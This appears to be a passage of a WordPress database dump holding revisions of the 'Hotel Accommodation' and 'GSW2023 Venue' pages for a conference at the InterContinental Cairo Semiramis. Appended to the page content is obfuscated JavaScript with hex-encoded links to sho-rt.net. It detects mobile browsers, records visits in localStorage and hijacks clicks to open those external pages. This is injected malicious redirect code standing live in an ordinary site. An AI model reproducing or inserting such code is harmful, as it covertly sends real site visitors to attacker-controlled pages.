_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-02-04 05:39:45','2023-02-04 05:39:45','',2685,'https://gsw2023.com/?p=3749',0,'revision','',0),
(3750,1,'2023-02-04 05:44:12','2023-02-04 05:44:12','[vc_row][vc_column][vc_column_text]\r\n<div class=\"three_quarter first\"><section class=\"clear\"><strong><a>GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS </a></strong></section>\r\n<ul>\r\n 	<li style=\"text-align: justify;\">\r\n<h6><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h6>\r\n</li>\r\n</ul>\r\n<div class=\"gap-10\"></div>\r\n<ul>\r\n 	<li><strong><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></strong></li>\r\n</ul>\r\n</div>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-02-04 05:44:12','2023-02-04 05:44:12','',2679,'https://gsw2023.com/?p=3750',0,'revision','',0),
(3751,1,'2023-02-04 06:02:41','2023-02-04 06:02:41','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><span style=\"font-family: droid-serif;\"><strong><a><span style=\"font-size: 12pt;\">GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS</span> </a></strong></span></section>\n<ul>\n<li style=\"text-align: justify;\"><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></li>\n</ul>\n<p>&nbsp;</p>\n<div class=\"gap-10\"></div>\n<ul>\n<li><strong><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></strong></li>\n</ul>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 